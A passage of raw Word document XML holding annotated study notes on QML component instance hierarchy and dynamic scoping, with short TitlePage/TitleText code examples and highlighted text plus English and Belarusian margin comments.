      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>had a</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titletype</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property in the previous example,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titletype</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id would still take precedence</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00207D80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="007F5E0C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="536" w:name="component-instance-hierarchy"/>
      <w:bookmarkStart w:id="537" w:name="_Toc483000645"/>
      <w:bookmarkStart w:id="538" w:name="_Toc483003662"/>
      <w:bookmarkStart w:id="539" w:name="_Toc483603998"/>
      <w:bookmarkStart w:id="540" w:name="_Toc483605218"/>
      <w:bookmarkEnd w:id="536"/>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component Instance Hierarchy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
      <w:bookmarkEnd w:id="538"/>
      <w:bookmarkEnd w:id="539"/>
      <w:bookmarkEnd w:id="540"/>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In QML, </w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">component </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instances connect their component scopes together to form a scope hierarch</w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Component instances can </w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directly access</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component sco</w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pes of their ancestors</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The easiest way to demonstrate this is with inline sub-components whose component scopes are implicitly scoped as children of the outer component.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Item</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color defaultColor</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"blue"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ListView</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delegate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Component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Rectangle</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color</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defaultColor</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The component instance hierarchy allows instances of the delegate component to access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defaultColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property of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Item</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type. Of course, had the delegate component had a property called</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defaultColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that would have taken </w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>precedence</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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7F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The component instance scope hierarchy extends to out-of-line components, too.</w:t>
      </w:r>
      <w:r w:rsidR="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>very extra-ordinary feature of qml</w:t>
      </w:r>
      <w:r w:rsidR="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,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TitlePage.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component creates two</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TitleText</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instances. Even though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TitleText</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type is in a separate file, it still has access to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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property when it is used from within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TitlePage</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. QML is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dynamically scoped language</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - depending on where it is used,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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property may resolve differently.</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// TitlePage.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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Item</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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TitleText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size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22</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anchors</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top</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parent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top</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TitleText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size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18</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anchors</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bottom</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parent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bottom</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// TitleText.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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Text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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> size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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    text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"&lt;b&gt;"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title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"&lt;/b&gt;"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font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pixelSize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size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scoping is very powerful</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be u</w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sed cautiously</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prevent the behavior of QML code from becoming difficult to predict</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In general it sho</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uld only be used in cases where the two components are already tightly coupled</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in another way. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When building reusable components</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="0027257D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>preferable to use property interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, like this:</w:t>
      </w:r>
      <w:r w:rsidR="0027257D" w:rsidRPr="0027257D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F10942" w:rsidRPr="007A24CD" w:rsidRDefault="00F10942" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>тут</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>дадал</w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">і ў </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TextTitle </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>унутраныя ўласцівасці, на якія зараз можна спасылацца. Так што дынамічнага разрашэння прастораў імёнаў няма</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="007A24C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be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
